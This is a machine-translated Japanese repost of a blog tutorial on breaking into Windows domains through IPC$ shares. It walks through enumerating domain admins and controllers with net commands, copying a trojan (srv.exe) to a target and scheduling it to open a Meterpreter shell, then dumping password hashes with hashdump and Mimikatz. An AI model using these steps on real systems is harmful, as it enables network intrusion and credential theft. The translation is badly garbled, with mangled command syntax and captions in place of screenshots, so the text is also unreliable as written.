IPC $のネットワーク侵入

運転指令に関連するドメイン
1.ユーザードメインをチェック

/ドメインユーザーNET
のいくつかのフィールドに2.アクセス

ビューNET /ドメイン
3.チェックホストドメイン

ビューNET /ドメイン:XXX
4.ビューグループ内のフィールド

グループNET /ドメイン
5.すべてのホストドメイン名を参照してください。

グループNET「ドメインコンピュータ」/ドメイン
6.チェックドメイン管理者

グループNET「ドメイン管理者」/ドメイン
7.ドメインコントローラが参照してください。

グループNET「ドメインコントローラ」/ドメイン
8.ビュー管理グループ

グループNET「エンタープライズ管理者」/ドメイン
9.サーバー表示時間

nettime /ドメイン
2、侵略IPC $
IPC $侵略を共有し、デフォルトでIPC $の侵入は、ネットワークと共通含め、Windowsシステムを使用してコンピュータの制御を取得するために始めました。
IPC $のホストがあることを今仮定:127.0.0.25、次のコマンドを入力します。

#接続127.0.0.25 IPC $共有:
D:IPC $ \ 127.0.0.25 \> NET用
ターゲットホストへ#コピーsrv.exe
D:>コピーsrv.exe 127.0.0.25 \ IPC $ \
#チェックタイム
D:>時間NET \ 127.0.0.25
srv.exeで10時50分で、#useコマンドを開始する(設定時間は、ホスト時間よりも高速であることに注意してください)
D:> \ 127.0.0.25 10:50 srv.exeの
コマンドがである上コンピュータに聞かせて物事が(例えば、プログラムを実行している)指定した時刻にコマンドを指定しません

ここでは、サーバーにアップロードされたペイロードPAVMSEP131を殺す避けるために、その後、ペイロードを開始Meterpreterシェル立ち直るためにコマンドで使用し
、ターゲット・サーバーにコピーされたトロイの木馬を

システム時刻を確認します

トロイの木馬を起動するコマンドで使用します

そして、あなたは集会の成功を見ることができ、ハンドラモニターを返す、我々はPAVMSEP131サーバMeterpreterシェル得
ラリーの成功を

以下の情報PAVMSEP131サーバーを見て、今の許可
システム情報を表示します

Mimikatz他のツールを使用するかを示す、SYSTEM権限を見ることができ、あなたも実行入力できポスト/窓/収集/ hashdumpハッシュが来
注意することがMimikatzポイントでハッシュを把握する前に:に、あなたは、64ビットサーバーオペレーティングシステムをインストールしている場合平文パスワード64ビットのオペレーティングシステムを表示するために、64ビットのプログラム処理に移行するMimikatzプロセスは、32ビットシステムでは、この制限を持っていません。

本明細書において使用されるMimikatzキャッチハッシュとして

アップロードMimikatz

ハッシュクロール

キャッチドメインユーザー権限を確認

 

おすすめ

転載: www.cnblogs.com/Fluorescence-tjy/p/11222514.html
IPC